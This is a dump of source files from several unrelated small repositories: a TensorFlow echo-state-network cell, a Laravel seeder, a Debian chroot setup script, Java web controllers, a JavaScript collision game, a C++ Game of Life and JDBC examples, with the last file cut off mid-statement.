""" Run one step of ESN Cell
Args:
inputs: `2-D Tensor` with shape `[batch_size x input_size]`.
state: `2-D Tensor` with shape `[batch_size x self.state_size]`.
scope: VariableScope for the created subgraph; defaults to class `ESNCell`.
Returns:
A tuple `(output, new_state)`, computed as
`output = new_state = (1 - leaky) * state + leaky * activation(Win * input + Wr * state + B)`.
Raises:
ValueError: if `inputs` or `state` tensor size mismatch the previously provided dimension.
"""
inputs = convert_to_tensor(inputs)
input_size = inputs.get_shape().as_list()[1]
dtype = inputs.dtype
# Inicializamos el reservorio (wr), pesos de entrada (win), vector de ganancia (a) y vector de bias (b)
with vs.variable_scope(self.__scope or type(self).__name__, reuse=tf.AUTO_REUSE):
win = vs.get_variable("InputMatrix", [input_size, self._num_units], dtype=dtype,
trainable=False, initializer=self._win_initializer)
wr = vs.get_variable("ReservoirMatrix", [self._num_units, self._num_units], dtype=dtype,
trainable=False, initializer=self._wr_initializer)
# Parametros de IP, ganancia a y bias b
a = vs.get_variable("GainVector", [self._num_units], dtype=dtype,
trainable=True, initializer=tf.ones_initializer())
b = vs.get_variable("Bias", [self._num_units], dtype=dtype, trainable=True,
initializer=tf.zeros_initializer())
diag_a = tf.diag(a)
_wr = math_ops.matmul(diag_a, wr)
_win = math_ops.matmul(win, diag_a) # Se invierte el orden para multiplicar
in_mat = array_ops.concat([inputs, state], axis=1)
weights_mat = array_ops.concat([_win, _wr], axis=0) # Por invertir el orden arriba, esto se mantiene igual
# bias anterior eliminado
# Obtencion de nuestros valores x e y para IP
x_a = math_ops.matmul(in_mat, weights_mat) + b
y_ip = self._activation(x_a)
# output = (1 - self._leaky) * state + self._leaky * self._activation(math_ops.matmul(in_mat, weights_mat)+b)
# Reglas de actualizacion de a y b (como escoger la regla si es con fermi o tanh? con un if?)
# Regla para el caso de tanh
# g_b = -self._learning_rate * (-(self._mean / tf.pow(self._std, 2)) + (y_ip / tf.pow(self._std, 2)) * (
# 2 * tf.pow(self._std, 2) + 1 - tf.pow(y_ip, 2) + self._mean * y_ip))
# g_a = self._learning_rate / a + g_b * x_a
# _a=a+g_a
# _b=b+g_b
# a.assign(tf.squeeze(_a))
# b.assign(tf.squeeze(_b))
return y_ip, y_ip
# el return es output y new_state
| 804a1ceacce938854d8c2fac3d73e8495ad91135 | [
"Markdown",
"Python"
] | 3 | Python | JeanCarloMacan/TFM | 142f30fd8a33b1ab76ee410096a832f1a37be2c4 | bcc359b91c25d5d5151bc34242e4f90bba6f75c7 |
refs/heads/main | <file_sep><?php
namespace Database\Seeders;
use Illuminate\Database\Seeder;
use Illuminate\Support\Facades\DB;
class ProductSeeder extends Seeder
{
/**
* Run the database seeds.
*
* @return void
*/
public function run()
{
//
DB::table('products')->insert(
[
'name'=>'LG mobile',
'price'=>'200$',
'descriptoin'=>'Lorem ipsum dolor sit amet consectetur adipisicing elit. Perspiciatis, soluta.',
'category'=>'mobile',
'gallery'=>'https://www.savol-javob.com/wp-content/uploads/2020/05/Paket_Kado_Gift_Valentine_Teddy_Bear_08_Buket_Bunga-869x1024.jpg'
],
[
'name'=>'XuwaWei mobile',
'price'=>'200$',
'descriptoin'=>'Lorem ipsum dolor sit amet consectetur adipisicing elit. Perspiciatis, soluta.',
'category'=>'mobile',
'gallery'=>'https://pbs.twimg.com/media/CmOloNaWYAAWnOL.jpg'
],
[
'name'=>'Samsung mobile',
'price'=>'200$',
'descriptoin'=>'Lorem ipsum dolor sit amet consectetur adipisicing elit. Perspiciatis, soluta.',
'category'=>'mobile',
'gallery'=>'https://pbs.twimg.com/media/DxIH8eYX0AE98My.jpg:large'
],
[
'name'=>'Nokis mobile',
'price'=>'200$',
'descriptoin'=>'Lorem ipsum dolor sit amet consectetur adipisicing elit. Perspiciatis, soluta.',
'category'=>'mobile',
'gallery'=>'https://www.savol-javob.com/wp-content/uploads/2020/05/4MlyYBXUYCmMN27UC6aXF24sXclH0wPqx6VnWsVQf5ZJMgfKtxcKxpE_bJ4q1BLwkm_t-NkLENPAU14tVFnlI8G4s6BRMVRZvXZvEeuDUsPrGbiM5yezK5Mx9zpVJP.jpg'
],
[
'name'=>'RedME mobile',
'price'=>'200$',
'descriptoin'=>'Lorem ipsum dolor sit amet consectetur adipisicing elit. Perspiciatis, soluta.',
'category'=>'mobile',
'gallery'=>'https://www.savol-javob.com/wp-content/uploads/2020/05/4MlyYBXUYCmMN27UC6aXF24sXclH0wPqx6VnWsVQfobIVuPbN8dahtCfaD5fUTfV90497dluASPQxr68hLnAY7V44_UBoSQJ-BMvdPvC1vINvz9A-768x768.jpg'
]
);
}
}
| 4e648faae2db5dd26cb989829cb024ff5a50e3a1 | [
"PHP"
] | 1 | PHP | Quvonchbek-1227/EccomrsePr | 6e8f1a1b902c52f57b762f402d8105fc1c7fc3e9 | 5f058dbeaa1905e00625cf4d3f057c95c23d1ee6 |
refs/heads/master | <repo_name>perlbot/evalserver-config<file_sep>/gensystem.sh
#!/bin/bash
set -e
set -u
mkdir system
debootstrap stretch system
# Install perlbrew, and perl-5.24.1
cat > system/install.sh <<'EOF'
#!/bin/bash
set -e
set -u
apt-get install build-essential perlbrew
export PERLBREW_ROOT=/opt/perlbrew
mkdir -p $PERLBREW_ROOT
perlbrew init
perlbrew install perl-5.24.1
perlbrew switch perl-5.24.1
perlbrew install-cpanm
EOF
cat > system/etc/profile.d/perlbrew.sh << EOF
export PERLBREW_ROOT=/opt/perlbrew
EOF
chmod +x system/install.sh
# This should now install perlbrew, switch to perlbrew to 5.24.1, and install cpanm
chroot system /install.sh
echo The system is now ready to be used
| d3c969a53ec88ad736474096a3f63ca8891b80e6 | [
"Shell"
] | 1 | Shell | perlbot/evalserver-config | d2ba7eec9e750f4afd80c72acda8cd120bb69f63 | a68fe9037c861fbb0561b1d1d954ddbe06476256 |
refs/heads/master | <file_sep>package com.im.stockapp.actions;
import java.io.File;
import java.util.List;
import javax.servlet.ServletContext;
import org.apache.commons.io.FileUtils;
import org.apache.struts2.ServletActionContext;
import com.im.stockapp.models.Customer;
import com.im.stockapp.utils.DB;
import com.opensymphony.xwork2.ActionSupport;
public class CustomerAction extends ActionSupport{
private Customer customer;
private List<Customer> customerList;
public String execute() {
customerList = (List<Customer>)DB.list("Customer");
return SUCCESS;
}
public String add() {
DB.save(customer);
try {
ServletContext servletContext = ServletActionContext.getServletContext();
String filePath = servletContext.getRealPath("/uploads/");
File fileToCreate = new File(filePath, customer.getPhotoFileName());
FileUtils.copyFile(customer.getPhoto(), fileToCreate);
}catch(Exception e) {
e.printStackTrace();
addActionError(e.getMessage());
return INPUT;
}
customerList =(List<Customer>)DB.list("Customer");
return SUCCESS;
}
public String delete() {
DB.delete(customer);
customerList =(List<Customer>)DB.list("Customer");
return SUCCESS;
}
public Customer getCustomer() {
return customer;
}
public void setCustomer(Customer customer) {
this.customer = customer;
}
public List<Customer> getCustomerList() {
return customerList;
}
public void setCustomerList(List<Customer> customerList) {
this.customerList = customerList;
}
}
<file_sep>package com.im.stockapp.actions;
import java.io.File;
import java.util.List;
import javax.servlet.ServletContext;
import org.apache.commons.io.FileUtils;
import org.apache.struts2.ServletActionContext;
import com.im.stockapp.models.Item;
import com.im.stockapp.utils.DB;
import com.opensymphony.xwork2.ActionSupport;
public class ItemAction extends ActionSupport{
private Item item;
private List<Item> itemList;
public String execute() {
itemList = (List<Item>)DB.list("Item");
return SUCCESS;
}
public String add() {
DB.save(item);
try {
ServletContext servletContext = ServletActionContext.getServletContext();
String filePath = servletContext.getRealPath("/uploads/");
File fileToCreate = new File(filePath, item.getPhotoFileName());
FileUtils.copyFile(item.getPhoto(), fileToCreate);
}catch(Exception e) {
e.printStackTrace();
addActionError(e.getMessage());
return INPUT;
}
itemList =(List<Item>)DB.list("Item");
return SUCCESS;
}
public String delete() {
DB.delete(item);
itemList =(List<Item>)DB.list("Item");
return SUCCESS;
}
public Item getItem() {
return item;
}
public void setItem(Item item) {
this.item = item;
}
public List<Item> getItemList() {
return itemList;
}
public void setItemList(List<Item> itemList) {
this.itemList = itemList;
}
}
| 372d840bc51e99d5d5483e3664cadbaf10a09333 | [
"Java"
] | 2 | Java | ManodyaAbeysinghe/StockApp | 4e688b9ddfee7657b8fd28771e1c0b82544a7366 | ca25ecf9f5278d7095528446eae37d21725a447f |
refs/heads/master | <repo_name>chandanshukla1989/devopcode<file_sep>/main.sh
terraform init /home/shukla_chandan64/gitpush
gcloud -q compute images delete adhocvm-image --project=imperial-legacy-232115
gcloud -q compute instances delete adhoc-vm --project=imperial-legacy-232115 --zone=us-west1-a
> /home/shukla_chandan64/gitpush/terraform.tfstate
terraform apply -auto-approve /home/shukla_chandan64/gitpush
#########################prepare host for /etc/hosts file
cat terraform.tfstate|grep network_ip|cut -d'"' -f4|awk '{print $1" adhoc-vm"}' > host_etc
sudo bash -c 'cat host_etc > /etc/hosts'
ssh-keygen -f "/home/shukla_chandan64/.ssh/known_hosts" -R adhoc-vm
chmod 400 /home/shukla_chandan64/keyfiles/privatekey.pem
ssh -o "StrictHostKeyChecking=no" -i /home/shukla_chandan64/keyfiles/privatekey.pem adhoc-vm "echo Adding Keys in Host"
#########################prepare hostlist for ansible
#echo -e "[adhoc-vm]\nadhoc-vm ansible_ssh_private_key_file=/home/shukla_chandan64/gitpush/keyfiles/privatekey.pem\n[runner-vm]\nrunner-vm ansible_ssh_private_key_file=/home/shukla_chandan64/gitpush/keyfiles/privatekey.pem" > /home/shukla_chandan64/gitpush/ansible_playbooks/ansible_host
cat /etc/hosts
cat /home/shukla_chandan64/gitpush/ansible_playbooks/ansible_host
sleep 10s
ansible-playbook /home/shukla_chandan64/gitpush/ansible_playbooks/pipinstall.yaml -i /home/shukla_chandan64/gitpush/ansible_playbooks/ansible_host
ansible-playbook /home/shukla_chandan64/gitpush/ansible_playbooks/install-python-packages.yaml -i /home/shukla_chandan64/gitpush/ansible_playbooks/ansible_host
gcloud compute instances stop adhoc-vm --zone=us-west1-a
gcloud compute images create adhocvm-image --project=imperial-legacy-232115 --source-disk=adhoc-vm --source-disk-zone=us-west1-a
> ./terraform.tfstate
gcloud -q compute instances delete runner-vm --project=imperial-legacy-232115 --zone=us-west1-a
terraform apply -auto-approve /home/shukla_chandan64/gitpush/restore_from_image
ssh-keygen -f "/home/shukla_chandan64/.ssh/known_hosts" -R runner-vm
cat terraform.tfstate|grep network_ip|cut -d'"' -f4|awk '{print $1" runner-vm"}' > host_etc
sudo bash -c 'cat host_etc >> /etc/hosts'
| 90ee818b2b825ef8af23a94cfa4396ded0235f56 | [
"Shell"
] | 1 | Shell | chandanshukla1989/devopcode | a2c16f56761fb67ede1df625daf79cfba875ef5b | 3e7fbe00c0a99c091291869a254da4276775f52e |
refs/heads/main | <file_sep>package com.ims.springjwt.controllers;
import com.ims.springjwt.bean.EmailComponent;
import com.ims.springjwt.services.EmailService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestMapping;
@Controller
public class EmailController {
@Autowired
private EmailComponent emailComponent;
// @PostMapping(value = "/sendmail")
@RequestMapping(value = "/sendmail")
public void sendEmail() {
// use mailSender here...
System.out.println("controller done..!");
emailComponent.sendMail("<EMAIL>", "Test Subject", "Test mail");
System.out.println("controller done2..!");
}
// @Autowired
// private EmailService emailService;
//
// @PostMapping(value = "/sendmail")
// public void sendEmail() {
// // use mailSender here...
// System.out.println("controller done..!");
// emailService.sendMail("<EMAIL>", "Test Subject", "Test mail");
// System.out.println("controller done2..!");
// }
}
<file_sep>package com.ims.springjwt.services;
import com.ims.springjwt.models.User;
import com.ims.springjwt.payload.request.ForgotPassword;
import org.springframework.web.bind.annotation.RequestBody;
import java.util.List;
public interface UserService {
User forgotPassword(@RequestBody ForgotPassword forgotPassword);
List<User> fetchUserLikeStudent();
}
<file_sep>package com.ims.springjwt.controllers;
import com.ims.springjwt.models.Buyer;
import com.ims.springjwt.models.OrderMaster;
import com.ims.springjwt.services.OrderMasterService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Controller;
import org.springframework.web.bind.annotation.*;
import java.util.List;
@RestController
@CrossOrigin(origins = "*", allowedHeaders = "*")
@RequestMapping("/api")
public class OrderMasterController {
@Autowired
OrderMasterService orderMasterService;
@GetMapping("/getBuyer")
public List<Buyer> getBuyer()
{
return orderMasterService.getBuyer();
}
@PostMapping("/saveOrderMasterList")
public List<OrderMaster> saveOrderMasterList(@RequestBody List<OrderMaster> orderMasterList)
{
return orderMasterService.saveOrderMasterList(orderMasterList);
}
@PostMapping("/saveOrderMaster")
public OrderMaster saveOrderMaster(@RequestBody OrderMaster orderMaster)
{
return orderMasterService.saveOrderMaster(orderMaster);
}
}
<file_sep>package com.ims.springjwt.services.impl;
import com.ims.springjwt.models.Category;
import com.ims.springjwt.models.Item;
import com.ims.springjwt.models.StyleMaster;
import com.ims.springjwt.repository.CategoryRepository;
import com.ims.springjwt.repository.ItemRepository;
import com.ims.springjwt.repository.StyleMasterRepository;
import com.ims.springjwt.services.StyleMasterService;
import org.springframework.beans.factory.annotation.Autowired;
import org.springframework.stereotype.Service;
import java.util.List;
@Service
public class StyleMasterServiceimpl implements StyleMasterService {
@Autowired
CategoryRepository categoryRepository;
@Autowired
ItemRepository itemRepository;
@Autowired
StyleMasterRepository styleMasterRepository;
@Override
public List<Category> OrderMasterCategory() {
return categoryRepository.findAll();
}
@Override
public List<Item> OrderMasterItem() {
return itemRepository.findAll();
}
@Override
public List<StyleMaster> saveStyleMaster(List<StyleMaster> styleMasterList) {
return styleMasterRepository.saveAll(styleMasterList);
}
@Override
public List<StyleMaster> getStyleMaster() {
return styleMasterRepository.findAll();
}
@Override
public String deleteProduct(Long id) {
styleMasterRepository.deleteById(id);
return "product removed !! " + id;
}
@Override
public List<Item> OrderMasterItemFindByCategory(Long id) {
return itemRepository.findByCategory_Id(id);
}
}
<file_sep>package com.ims.springjwt.repository;
import java.util.List;
import java.util.Optional;
import com.ims.springjwt.models.User;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.data.jpa.repository.Query;
import org.springframework.stereotype.Repository;
@Repository
public interface UserRepository extends JpaRepository<User, Long> {
Optional<User> findByUsername(String username);
Optional<User> findByEmail(String email);
Boolean existsByUsername(String username);
Boolean existsByEmail(String email);
@Query(value ="select * from users INNER JOIN user_roles ur on users.id = ur.user_id where role_id = 1",nativeQuery = true)
List<User> fetchUser();
}
<file_sep>package com.ims.springjwt.models;
import lombok.*;
import javax.persistence.*;
@Data
@AllArgsConstructor
@NoArgsConstructor
@Setter
@Getter
@Entity
public class StyleMaster {
@Id
@GeneratedValue(strategy= GenerationType.IDENTITY)
private Long id;
private Long idMy;
private String itemCode;
private String styleCode;
private String styleName;
private int quantity;
private String status;
private String type;
@ManyToOne(cascade = {CascadeType.DETACH})
@JoinColumn(name = "CategoryId", referencedColumnName = "id")
private Category category;
@ManyToOne(cascade = {CascadeType.DETACH})
@JoinColumn(name = "ItemId", referencedColumnName = "id")
private Item item;
private double consumption;
}
<file_sep># ousl-s-backend<file_sep>package com.ims.springjwt.repository;
import com.ims.springjwt.models.OrderMaster;
import com.ims.springjwt.models.Role;
import org.springframework.data.jpa.repository.JpaRepository;
import org.springframework.stereotype.Repository;
@Repository
public interface OrderMasterRepository extends JpaRepository<OrderMaster, Long> {
}
| 4aea447718697bea9056cb12d841944adaa596f7 | [
"Markdown",
"Java"
] | 8 | Java | MohamedNifrad/ousl-s-backend | b07a34f6b739ebef4a1a115be027f302bfb2efd1 | f429f6acf91a3df9bcb1a3fce455f197b450be44 |
refs/heads/master | <file_sep>import "./styles.css";
import Game from "/src/game";
let canvas = document.getElementById("gameScreen");
let ctx = canvas.getContext("2d");
/*
let game = new Game(GAME_WIDTH, GAME_HEIGHT);
let lastTime = 0;
function gameLoop(timestamp) {
let deltaTime = timestamp - lastTime;
lastTime = timestamp;
ctx.clearRect(0, 0, GAME_WIDTH, GAME_HEIGHT);
game.update(deltaTime);
game.draw(ctx);
requestAnimationFrame(gameLoop);
}
requestAnimationFrame(gameLoop); */
const { Collisions } = require("detect-collisions");
const result = Collisions.createResult();
export default class Tank {
constructor() {
const width = window.innerWidth;
const height = window.innerHeight;
const collisions = new Collisions();
this.element = document.createElement("div");
this.canvas = document.getElementById("gameScreen"); //document.createElement('canvas')
this.context = this.canvas.getContext("2d");
this.collisions = collisions;
this.bodies = [];
this.canvas.width = width;
this.canvas.height = height;
this.player = null;
this.oneBall = null;
this.up = false;
this.down = false;
this.left = false;
this.right = false;
this.element.innerHTML = `
<div><b>W, S</b> - Accelerate/Decelerate</div>
<div><b>A, D</b> - Turn</div>
<div><label><input id="bvh" type="checkbox"> Show Bounding Volume Hierarchy</label></div>
`;
const updateKeys = e => {
const keydown = e.type === "keydown";
const key = e.key.toLowerCase();
key === "w" && (this.up = keydown);
key === "s" && (this.down = keydown);
key === "a" && (this.left = keydown);
key === "d" && (this.right = keydown);
};
document.addEventListener("keydown", updateKeys);
document.addEventListener("keyup", updateKeys);
this.bvh_checkbox = this.element.querySelector("#bvh");
this.element.appendChild(this.canvas);
this.game = new Game(width, height);
this.createPlayer(400, 300);
this.createMap(width, height);
let lastTime = 0;
const frame = timestamp => {
this.update();
let deltaTime = timestamp - lastTime;
lastTime = timestamp;
//ctx.clearRect(0, 0, width, height);
this.game.update(deltaTime);
this.game.draw(ctx);
requestAnimationFrame(frame);
};
frame();
}
update() {
this.handleInput();
this.processGameLogic();
this.handleCollisions();
this.render();
}
handleInput() {
this.up && (this.player.velocity += 0.1);
this.down && (this.player.velocity -= 0.1);
this.left && (this.player.angle -= 0.04);
this.right && (this.player.angle += 0.04);
}
processGameLogic() {
const x = Math.cos(this.player.angle);
const y = Math.sin(this.player.angle);
if (this.player.velocity > 0) {
this.player.velocity -= 0.05;
if (this.player.velocity > 3) {
this.player.velocity = 3;
}
} else if (this.player.velocity < 0) {
this.player.velocity += 0.05;
if (this.player.velocity < -2) {
this.player.velocity = -2;
}
}
if (!Math.round(this.player.velocity * 100)) {
this.player.velocity = 0;
}
if (this.player.velocity) {
this.player.x += x * this.player.velocity;
this.player.y += y * this.player.velocity;
}
this.oneBall.x = this.game.gameObjects[0].position.x;
this.oneBall.y = this.game.gameObjects[0].position.y;
}
handleCollisions() {
this.collisions.update();
const potentials = this.player.potentials();
// Negate any collisions
for (const body of potentials) {
if (this.player.collides(body, result)) {
this.player.x -= result.overlap * result.overlap_x;
this.player.y -= result.overlap * result.overlap_y;
this.player.velocity *= 0.9;
}
}
const potentials2 = this.oneBall.potentials();
// Negate any collisions
for (const body of potentials2) {
if (this.oneBall.collides(body, result)) {
this.oneBall.x -= result.overlap * result.overlap_x;
this.oneBall.y -= result.overlap * result.overlap_y;
this.oneBall.velocity.x = -2 * result.overlap_x;
this.oneBall.velocity.y = -2 * result.overlap_y;
}
}
this.game.gameObjects[0].position.x = this.oneBall.x;
this.game.gameObjects[0].position.y = this.oneBall.y;
this.game.gameObjects[0].velocity.x = this.oneBall.velocity.x;
this.game.gameObjects[0].velocity.y = this.oneBall.velocity.y;
}
render() {
this.context.fillStyle = "#000000";
this.context.fillRect(0, 0, this.canvas.width, this.canvas.height);
this.context.strokeStyle = "#FFFFFF";
this.context.beginPath();
this.collisions.draw(this.context);
this.context.stroke();
if (this.bvh_checkbox.checked) {
this.context.strokeStyle = "#00FF00";
this.context.beginPath();
this.collisions.drawBVH(this.context);
this.context.stroke();
}
}
createPlayer(x, y) {
this.player = this.collisions.createPolygon(
x,
y,
[[-20, -10], [20, -10], [20, 10], [-20, 10]],
0.2
);
this.player.velocity = 0;
}
createMap(width, height) {
// World bounds
this.collisions.createPolygon(0, 0, [[0, 0], [width, 0]]);
this.collisions.createPolygon(0, 0, [[width, 0], [width, height]]);
this.collisions.createPolygon(0, 0, [[width, height], [0, height]]);
this.collisions.createPolygon(0, 0, [[0, height], [0, 0]]);
// Factory
this.collisions.createPolygon(
100,
100,
[[-50, -50], [50, -50], [50, 50], [-50, 50]],
0.4
);
this.collisions.createPolygon(
190,
105,
[[-20, -20], [20, -20], [20, 20], [-20, 20]],
0.4
);
/*
this.collisions.createCircle(170, 140, 8);
this.collisions.createCircle(185, 155, 8);
this.collisions.createCircle(165, 165, 8);
this.collisions.createCircle(145, 165, 8);
*/
this.game.gameObjects.forEach(
ball =>
(this.oneBall = this.collisions.createCircle(
ball.position.x,
ball.position.y,
ball.size
))
);
this.oneBall.velocity = { x: 2.0, y: 2.0 };
// Airstrip
this.collisions.createPolygon(
230,
50,
[[-150, -30], [150, -30], [150, 30], [-150, 30]],
0.4
);
// HQ
this.collisions.createPolygon(
100,
500,
[[-40, -50], [40, -50], [50, 50], [-50, 50]],
0.2
);
this.collisions.createCircle(180, 490, 20);
this.collisions.createCircle(175, 540, 20);
// Barracks
this.collisions.createPolygon(
400,
500,
[[-60, -20], [60, -20], [60, 20], [-60, 20]],
1.7
);
this.collisions.createPolygon(
350,
494,
[[-60, -20], [60, -20], [60, 20], [-60, 20]],
1.7
);
// Mountains
this.collisions.createPolygon(750, 0, [[0, 0], [-20, 100]]);
this.collisions.createPolygon(750, 0, [[-20, 100], [30, 250]]);
this.collisions.createPolygon(750, 0, [[30, 250], [20, 300]]);
this.collisions.createPolygon(750, 0, [[20, 300], [-50, 320]]);
this.collisions.createPolygon(750, 0, [[-50, 320], [-90, 500]]);
this.collisions.createPolygon(750, 0, [[-90, 500], [-200, 600]]);
// Lake
this.collisions.createPolygon(550, 100, [
[-60, -20],
[-20, -40],
[30, -30],
[60, 20],
[60, 70],
[40, 120],
[-30, 110],
[-80, 90],
[-110, 50],
[-100, 20]
]);
}
}
/* function random(min, max) {
return Math.floor(Math.random() * max) + min;
} */
if (typeof exports !== "undefined") {
exports = Tank;
exports.default = exports;
}
let example;
example = new Tank();
document.body.appendChild(example.element);
| 9a644aa5909961456bfadd24605de776057c0b4c | [
"JavaScript"
] | 1 | JavaScript | santiHerranz/BouncingBalls | 190d1eb1695a54546069935bfa867bc7fdc045ab | 83ed5590777704681c6389b8abc28c1b3e89cdc6 |
refs/heads/master | <file_sep>#include <SFML/Graphics.hpp>
#include <SFML/Window/Keyboard.hpp>
#include <vector>
#include <iostream>
#include <math.h>
const unsigned int Width = 900;
const unsigned int Height = 900;
const unsigned int cellsWide = 100;
float cellSize = (float)Width / cellsWide;
float timeBetweenUpdates = 1;
class cell {
public:
bool isAlive() {
return this->alive;
}
void kill() {
this->alive = false;
this->body.setFillColor(sf::Color::Black);
this->body.setOutlineColor(sf::Color::White);
}
void birth() {
this->alive = true;
this->body.setFillColor(sf::Color::White);
this->body.setOutlineColor(sf::Color::Black);
}
sf::RectangleShape getBody() {
return this->body;
}
int getX() {
return this->x;
}
int getY() {
return this->y;
}
cell(int xposition, int yposition) {
this->x = xposition;
this->y = yposition;
this->alive = false;
this->body.setFillColor(sf::Color::Black);
this->body.setSize(sf::Vector2f(cellSize, cellSize));
this->body.setPosition(sf::Vector2f((this->x) * cellSize, (this->y) * cellSize));
this->body.setOutlineColor(sf::Color::White);
this->body.setOutlineThickness(0.5);
}
private:
int x, y; // x and y positions in the grid
bool alive; // tracks the state of the cell
sf::RectangleShape body; // the rectangle that represents the cell
};
std::vector<std::vector<cell>> cells; // matrix of cells
int numNeighbors(cell c) {
int count = 0;
for (int i = c.getX() - 1; i < c.getX() + 2; i++) {
for (int j = c.getY() - 1; j < c.getY() + 2; j++) {
if (i < 0 || j < 0) { continue; }
if (i > cells.size()-1) { continue; }
if (j > cells[i].size()-1) { continue; }
if (cells[i][j].isAlive()) {
count++;
}
else {
continue;
}
}
}
if (c.isAlive()) { count--; } // make sure to uncount yourself if you were alive
return count;
}
int main()
{
sf::RenderWindow window(sf::VideoMode(Width, Height), "Project 1 - the game of life", sf::Style::Titlebar | sf::Style::Close);
window.setFramerateLimit(60);
for (int i = 0; i < cellsWide; i++) { //for each row of the cell matrix
std::vector<cell> temp; //make a temp vector of cells
for (int j = 0; j < cellsWide; j++) { // for each cell in a row of the matrix
cell toAdd(i,j);
temp.push_back(toAdd);
}
cells.push_back(temp);
}
//cells[1][1].birth();
//std::cout << numNeighbors(cells[1][1]) << "\n";
int paused = 1; //1 for not paused -1 for paused
sf::Clock clock;
while (window.isOpen())
{
sf::Event event;
while (window.pollEvent(event))
{
if (event.type == sf::Event::Closed) {
window.close();
}
if (event.type == (sf::Event::KeyPressed)) {
if (event.key.code == sf::Keyboard::Space)
{
paused = paused * -1;
if (paused == -1) { std::cout << "paused \n"; }
else { std::cout << "unpaused \n"; }
}
}
if (event.type == sf::Event::MouseButtonPressed) {
sf::Vector2i mousePos = sf::Mouse::getPosition(window);
if (cells[floor(mousePos.x / cellSize)][floor(mousePos.y / cellSize)].isAlive()) {
cells[floor(mousePos.x / cellSize)][floor(mousePos.y / cellSize)].kill();
}
else { cells[floor(mousePos.x / cellSize)][floor(mousePos.y / cellSize)].birth(); }
}
}
if (clock.getElapsedTime() > sf::seconds(timeBetweenUpdates)) {
if (paused == 1) {//update the cells vector corectly
std::vector<std::vector<bool>> livingList; // used to keep track who should be alive or dead in the next round
for (int i = 0; i < cells.size(); i++) {
std::vector<bool> temp;
for (int j = 0; j < cells[i].size(); j++) {
if (numNeighbors(cells[i][j]) == 3) { temp.push_back(true); } // 3 neighbors birth a cell
else if (numNeighbors(cells[i][j]) <= 1) { temp.push_back(false); } // 1 or less live cells around and you will die
else if ((numNeighbors(cells[i][j]) == 2 && cells[i][j].isAlive())) { temp.push_back(true); } // if your already alive and have two neighbors you get to keep living
else { temp.push_back(false); }
}
livingList.push_back(temp);
}
for (int i = 0; i < cells.size(); i++) { //for each row of the cell matrix
for (int j = 0; j < cells[i].size(); j++) { // for each cell in a row of the matrix
if (livingList[i][j] == true) { cells[i][j].birth(); }
else { cells[i][j].kill(); }
}
}
livingList.clear();
/*for (int i = 0; i < temp.size(); i++) { //for each row of the cell matrix
for (int j = 0; j < temp[i].size(); j++) { // for each cell in a row of the matrix
if (!temp[i][j].isAlive() && (numNeighbors(temp[i][j]) == 3)) { cells[i][j].birth(); } // 3 neighbors birth a cell
else if (temp[i][j].isAlive() && (numNeighbors(temp[i][j]) < 2)) { cells[i][j].kill(); } // 1 or less cells around you is not enough to live, die from isolation
else if (temp[i][j].isAlive() && (numNeighbors(temp[i][j]) > 3)) { cells[i][j].kill(); } //overcrounding with 4 or more cells causes death.
}
}*/
}
clock.restart();
}
for (int i = 0; i < cells.size(); i++) { //for each row of the cell matrix
for (int j = 0; j < cells[i].size(); j++) { // for each cell in a row of the matrix
window.draw(cells[i][j].getBody()); // draw the cell
}
}
window.display();
window.clear(sf::Color::White);
}
return 0;
} | 72ec58da17256efbfdc278d1866478288b2ed47c | [
"C++"
] | 1 | C++ | mdrief4/Projects | 65a686141e27665c6b5302cba859666538d96c88 | c9a81e04b63c02cce9885ddb12fb7cc99bf08c71 |
refs/heads/master | <repo_name>AmhH/test-jdbc<file_sep>/src/com/example/crud/UpdatableResultSet.java
package com.example.crud;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import com.example.DBUtil;
import com.example.DBUtil.DBType;
public class UpdatableResultSet {
public static void main(String[] args) throws SQLException {
//Try with recourse : no need to close the connection
try (
Connection conn = DBUtil.getConnection(DBType.MSSQL);
Statement stmt = conn.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_UPDATABLE);
ResultSet rs = stmt.executeQuery("select * from Employees");
){
rs.absolute(6);
rs.updateString("Department", "IT");
rs.updateRow();
System.out.println("Record updated successfully");
rs.moveToInsertRow();
rs.updateInt("employeeId", 23);
rs.updateString("name", "Manew");
rs.insertRow();
System.out.println("Resord has been Inserted");
}catch (SQLException e) {
DBUtil.showErrorMessage(e);
}
}
}
<file_sep>/src/com/example/connection/ConnectionPoolingDemo.java
package com.example.connection;
import java.sql.Connection;
import java.sql.ResultSet;
import java.sql.Statement;
import javax.sql.PooledConnection;
public class ConnectionPoolingDemo {
public static void main(String[] args) {
OracleConnectionPoolDataSource ds = new OracleConnectionPoolDataDource();
ds.setDriverType("thin");
ds.setServerName("localhost");
ds.setPortNumber("1521");
ds.setServiceName("xe");
ds.setUser("hr");
ds.setPassword("hr");
PooledConnection pconn = ds.getPooledConnection();
Connection conn = pconn.getConnection();
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("select * from address");
}
}
<file_sep>/src/com/example/DBUtil.java
package com.example;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
public class DBUtil {
private static final String mySqlUser = "rot";
private static final String mySqlPwd = "<PASSWORD>";
private static final String mySqlCS = "jdbc:mysql://localhost:3306/abyssinia";
public enum DBType{
ORACLE, MYSQL, MSSQL;
}
public static Connection getConnection(DBType dbType) throws SQLException {
switch(dbType) {
case MYSQL:
return DriverManager.getConnection(mySqlCS, mySqlUser, mySqlPwd);
default:
return null;
}
}
public static void showErrorMessage(SQLException exception) {
System.err.println("Error :" + exception.getMessage());
System.err.println("Error COde :" + exception.getErrorCode());
}
}
<file_sep>/README.md
# test-jdbc
Add MySql or Oracle connection drivers to work with this project<file_sep>/src/com/example/crud/PreparedStatementInsert.java
package com.example.crud;
import java.sql.Connection;
import java.sql.Date;
import java.sql.PreparedStatement;
import java.sql.SQLException;
import com.example.DBUtil;
import com.example.DBUtil.DBType;
public class PreparedStatementInsert {
public static void main(String[] args) throws SQLException {
Connection conn = null;
PreparedStatement pstmt = null;
try {
conn = DBUtil.getConnection(DBType.MSSQL);
String sql = "INSERT INTO newemployee values(?,?,?,?}";
pstmt = conn.prepareStatement(sql);
pstmt.setInt(1, 50);
pstmt.setString(2, "email");
pstmt.setString(2, "name");
